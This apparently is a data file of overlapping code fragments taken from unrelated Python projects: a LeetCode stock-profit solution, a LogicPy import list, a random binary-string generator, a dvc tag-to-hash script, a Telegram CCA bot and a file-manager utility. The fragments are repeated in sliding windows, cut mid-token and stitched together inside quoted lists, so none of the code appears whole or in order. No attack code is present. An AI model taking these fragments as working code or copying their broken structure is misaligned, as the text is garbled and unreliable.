的时候卖出, 这笔交易所能获得利润 = 3-0", "-*- coding: utf-8 -*- # __author__ = xiaobao # __date__ = 2019/11/13 12:39:48", "= len(prices) if nLen <= 1 or k == 0: return 0 #", "思路 # 复杂度(时间/空间) # 时间 # 空间 # 代码 import sys class Solution:", "<= 1 or k == 0: return 0 # k = 正无穷 if", "# 输出: 7 # 解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第 3", "# __author__ = xiaobao # __date__ = 2019/11/13 12:39:48 # desc: desc #", "xiaobao # __date__ = 2019/11/13 12:39:48 # desc: desc # 给定一个数组,它的第 i 个元素是一支给定的股票在第", "len(prices) <= 1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1, [1]) == 0) ## len(prices)", "return dp_i_0 # k = 有限次数 dp_i_k_0 = [] for i in range(nLen+1):", "5 天 (股票价格 = 0) 的时候买入,在第 6 天 (股票价格 = 3) 的时候卖出, 这笔交易所能获得利润", "= 3 assert(solution.maxProfit(1, [1,4,8]) == 7) assert(solution.maxProfit(1, [1,8,4]) == 7) assert(solution.maxProfit(1, [4,1,8]) ==", "range(1, nLen+1): for j in range(k,0,-1): dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1]) dp_i_k_1[i][j]", "# 复杂度(时间/空间) # 时间 # 空间 # 代码 import sys class Solution: #", "4 ### 0次交易 assert(solution.maxProfit(1, [7,6,4,3,1]) == 0) ### 1次交易 assert(solution.maxProfit(1, [1,2,3,4,5]) == 4)", "= 3) 的时候卖出, 这笔交易所能获得利润 = 3-0 = 3 。 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv", "解释: 在第 1 天 (股票价格 = 2) 的时候买入,在第 2 天 (股票价格 = 4)", "- prices[i-1]) return dp_i_k_0[nLen][k] # 边界 solution = Solution() ## len(prices) <= 1", "边界 solution = Solution() ## len(prices) <= 1 assert(solution.maxProfit(1, []) == 0) assert(solution.maxProfit(1,", "# -*- coding: utf-8 -*- # __author__ = xiaobao # __date__ = 2019/11/13", "maxProfit(self, k, prices): nLen = len(prices) if nLen <= 1 or k ==", "if k >= nLen//2: dp_i_0 = 0 dp_i_1 = -sys.maxsize for i in", "2 # 输出: 7 # 解释: 在第 2 天 (股票价格 = 2) 的时候买入,在第", "# 空间 # 代码 import sys class Solution: # def maxProfit(self, k: int," ]
[ "import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import", "LogicPy.main_functions as main_functions import LogicPy.conversion as conversion import LogicPy.gates as gates import LogicPy.flipflops", "LogicPy.conversion as conversion import LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic", "as main_functions import LogicPy.conversion as conversion import LogicPy.gates as gates import LogicPy.flipflops as", "as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters import LogicPy.shift_registers as", "LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals", "combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters", "import LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import", "flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit", "as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as", "display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters import LogicPy.shift_registers as shift_registers", "as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as", "import LogicPy.conversion as conversion import LogicPy.gates as gates import LogicPy.flipflops as flipflops import", "main_functions import LogicPy.conversion as conversion import LogicPy.gates as gates import LogicPy.flipflops as flipflops", "LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters import LogicPy.shift_registers", "<filename>LogicPy/__init__.py import LogicPy.main_functions as main_functions import LogicPy.conversion as conversion import LogicPy.gates as gates", "conversion import LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic", "LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit", "LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters", "gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals", "import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import LogicPy.counters as counters import", "import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as display_terminals import LogicPy.arithematic_circuit as arithematic_circuit import", "as conversion import LogicPy.gates as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as", "import LogicPy.main_functions as main_functions import LogicPy.conversion as conversion import LogicPy.gates as gates import", "as gates import LogicPy.flipflops as flipflops import LogicPy.combination_logic as combination_logic import LogicPy.display_terminals as" ]
[ "count in range(size): message += str(random.randint(0,1)) return message n = 32 * 10000", "'' for count in range(size): message += str(random.randint(0,1)) return message n = 32", "random binary string def generateMessage (size): message = '' for count in range(size):", "string def generateMessage (size): message = '' for count in range(size): message +=", "for count in range(size): message += str(random.randint(0,1)) return message n = 32 *", "def generateMessage (size): message = '' for count in range(size): message += str(random.randint(0,1))", "n = 32 * 10000 # size of data file = open(\"testdata.txt\", \"w\")", "import random # generate a random binary string def generateMessage (size): message =", "a random binary string def generateMessage (size): message = '' for count in", "= '' for count in range(size): message += str(random.randint(0,1)) return message n =", "return message n = 32 * 10000 # size of data file =", "message += str(random.randint(0,1)) return message n = 32 * 10000 # size of", "(size): message = '' for count in range(size): message += str(random.randint(0,1)) return message", "# generate a random binary string def generateMessage (size): message = '' for", "message = '' for count in range(size): message += str(random.randint(0,1)) return message n", "str(random.randint(0,1)) return message n = 32 * 10000 # size of data file", "<reponame>neeladripal/bcse-lab import random # generate a random binary string def generateMessage (size): message", "+= str(random.randint(0,1)) return message n = 32 * 10000 # size of data", "random # generate a random binary string def generateMessage (size): message = ''", "32 * 10000 # size of data file = open(\"testdata.txt\", \"w\") file.write(generateMessage(n)) file.close()", "generateMessage (size): message = '' for count in range(size): message += str(random.randint(0,1)) return", "in range(size): message += str(random.randint(0,1)) return message n = 32 * 10000 #", "message n = 32 * 10000 # size of data file = open(\"testdata.txt\",", "= 32 * 10000 # size of data file = open(\"testdata.txt\", \"w\") file.write(generateMessage(n))", "range(size): message += str(random.randint(0,1)) return message n = 32 * 10000 # size", "binary string def generateMessage (size): message = '' for count in range(size): message", "generate a random binary string def generateMessage (size): message = '' for count" ]
[ "in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in", "convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l", "os from git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename,", "for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for", "+ os.linesep for t in tags] with open(hashes_filename, \"w\") as fobj: fobj.writelines(hashes) convert_to_sha()", "as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha", "Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip()", "\"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes =", "import os from git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with", "def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for", "tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep", "git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as", "Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags] with open(hashes_filename, \"w\")", "[git_repo.commit(t).hexsha + os.linesep for t in tags] with open(hashes_filename, \"w\") as fobj: fobj.writelines(hashes)", "hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags] with open(hashes_filename, \"w\") as", "= [git_repo.commit(t).hexsha + os.linesep for t in tags] with open(hashes_filename, \"w\") as fobj:", "with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\")", "fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags]", "import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj:", "open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes", "<gh_stars>0 import os from git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = []", "hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in", "git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags] with", "= Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags] with open(hashes_filename,", "tags = [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()])", "= [] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo", "l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha + os.linesep for t", "fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo = Repo(\"dvc\") hashes = [git_repo.commit(t).hexsha +", "from git import Repo def convert_to_sha(tags_filename=\"tags.txt\", hashes_filename=\"hashes.txt\"): tags = [] with open(tags_filename, \"r\")", "[] with open(tags_filename, \"r\") as fobj: tags.extend([l.strip() for l in fobj.readlines()]) git_repo =" ]
[]
[ "CCA = 1 SECOND = 2 def start(update, context): username = update.message.from_user.username first_name", "your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update, context): query =", "import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s", "the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)]", "one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update, context):", "= query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)]", "start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\",", "user. Please contact your CCA Head to register you or /register here.') def", "you are not a registered user. Please contact your CCA Head to register", "InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s", "username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca,", "def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you next time!\") return", "first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not a registered user.", "query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return", "callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one", "query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas]", "( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not a registered", "( first_name), reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok,", "2 def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started", "first_name), reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see", "[[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please", "Please contact your CCA Head to register you or /register here.') def back(update,", "context): query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username)", "ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger", "query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for", "here.') def back(update, context): query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name", "from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s -", "update.message.reply_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return", "- %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND = 2 def", "CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you next time!\")", "import get_user_ccas, is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler", "ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your CCAs.\" %", "= update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username):", "%(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND = 2", "back(update, context): query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas =", "is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas]", "logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__)", "CCA else: update.message.reply_text( 'Sorry, you are not a registered user. Please contact your", "username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if", "InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup)", "if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in", "'Sorry, you are not a registered user. Please contact your CCA Head to", "update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard", "select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text(", "= InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name),", "import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger =", "InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s -", "first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca", "reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" % (", "cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your", "1 SECOND = 2 def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name", "your CCA Head to register you or /register here.') def back(update, context): query", "or /register here.') def back(update, context): query = update.callback_query username = query.from_user.username first_name", "update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas", "= update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard =", "keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi", "from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s", "get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard)", "%s started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton(", "update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton(", "reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not a registered user. Please", "= query.from_user.first_name ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in", "= update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username)", "import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)", "= InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name),", "- %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND =", "register you or /register here.') def back(update, context): query = update.callback_query username =", "of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update, context): query", "CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query", "InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup)", "select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def end(update,", "= 2 def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s", "logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update, context): username = update.message.from_user.username", "level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update, context):", "to register you or /register here.') def back(update, context): query = update.callback_query username", "- %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1", "are not a registered user. Please contact your CCA Head to register you", "registered user. Please contact your CCA Head to register you or /register here.')", "for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of", "= [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s!", "def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the", "reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you", "format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA =", "= 1 SECOND = 2 def start(update, context): username = update.message.from_user.username first_name =", "/register here.') def back(update, context): query = update.callback_query username = query.from_user.username first_name =", "CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not", "else: update.message.reply_text( 'Sorry, you are not a registered user. Please contact your CCA", "cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your", "return CCA def end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you next", "in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your CCAs.\"", "logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard =", "telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s -", "= logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update, context): username =", "you or /register here.') def back(update, context): query = update.callback_query username = query.from_user.username", "cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select", "update.message.reply_text( 'Sorry, you are not a registered user. Please contact your CCA Head", "% ( first_name), reply_markup=reply_markup) return CCA def end(update, context): query = update.callback_query query.answer()", "end(update, context): query = update.callback_query query.answer() query.edit_message_text(text=\"Ok, see you next time!\") return ConversationHandler.END", "logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA", "cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select", "%s! Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA", "return CCA else: update.message.reply_text( 'Sorry, you are not a registered user. Please contact", "telegram.ext import ConversationHandler import logging logging.basicConfig( format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',", "is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging", "query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas = get_user_ccas(username) keyboard", "SECOND = 2 def start(update, context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User", "callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one", "%(name)s - %(levelname)s - %(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND", "spreadsheet.utility import get_user_ccas, is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import", "[[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please", "logger = logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update, context): username", "CCA Head to register you or /register here.') def back(update, context): query =", "% ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are not a", "started the conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca,", "def back(update, context): query = update.callback_query username = query.from_user.username first_name = query.from_user.first_name ccas", "register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import logging logging.basicConfig(", "a registered user. Please contact your CCA Head to register you or /register", "not a registered user. Please contact your CCA Head to register you or", "first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca", "reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of your CCAs.\" % (", "Head to register you or /register here.') def back(update, context): query = update.callback_query", "ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup", "= [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s!", "%(message)s', level=logging.INFO) logger = logging.getLogger(__name__) CCA = 1 SECOND = 2 def start(update,", "for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) update.message.reply_text(\"Hi %s! Please select one of", "one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry,", "in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your CCAs.\"", "= get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup =", "your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you are", "Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA def", "first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name) if is_registered(username): ccas =", "of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else: update.message.reply_text( 'Sorry, you", "contact your CCA Head to register you or /register here.') def back(update, context):", "context): username = update.message.from_user.username first_name = update.message.from_user.first_name logger.info(\"User %s started the conversation.\", first_name)", "Please select one of your CCAs.\" % ( first_name), reply_markup=reply_markup) return CCA else:", "get_user_ccas, is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext import ConversationHandler import", "keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for cca in ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi", "ccas] reply_markup = InlineKeyboardMarkup(keyboard) query.edit_message_text(\"Hi %s! Please select one of your CCAs.\" %", "from spreadsheet.utility import get_user_ccas, is_registered, register_user from telegram import InlineKeyboardButton, InlineKeyboardMarkup from telegram.ext", "conversation.\", first_name) if is_registered(username): ccas = get_user_ccas(username) keyboard = [[InlineKeyboardButton( cca, callback_data=cca)] for" ]
[ "<gh_stars>0 from kivy.uix.widget import Widget from kivy.uix.floatlayout import FloatLayout class RootWidget(FloatLayout): def __init__(self,", "kivy.uix.widget import Widget from kivy.uix.floatlayout import FloatLayout class RootWidget(FloatLayout): def __init__(self, **kwargs): super().__init__(**kwargs)", "from kivy.uix.widget import Widget from kivy.uix.floatlayout import FloatLayout class RootWidget(FloatLayout): def __init__(self, **kwargs):" ]
[ "__init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name,", "language) -> bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if", "'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return", "-> bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file):", "def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError:", "encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname)", "FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는", "get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with open(file, 'w',", "from re import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object):", "pathlib import Path from modules.languages import get_extension import os.path from re import sub", "os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param", "str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir,", "content, language) -> bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)])", "# 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' #", "def write_file(self, name, content, language) -> bool: basename = remove_win_special_char(name) file = self.dirname", "True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else:", "# print(f'이미 존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8') as f:", "return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir)", "파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일 저장 카운트 def __init__(self,", "mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename = remove_win_special_char(name) file =", "if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def", "remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}')", "0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir", "사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return", "self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename =", "특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '',", "/ self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename", "Path from modules.languages import get_extension import os.path from re import sub # 상위", "저장할 기본 디렉토리 save_cnt = 0 # 파일 저장 카운트 def __init__(self, *dirs):", "print(f'이미 존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8') as f: f.write(content)", "# 파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일 저장 카운트 def", "before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str) def get_file_dirname(file_path):", "저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname)", ":param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str) def", "/ ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with", "= '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일 저장", "return False else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1", "True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): 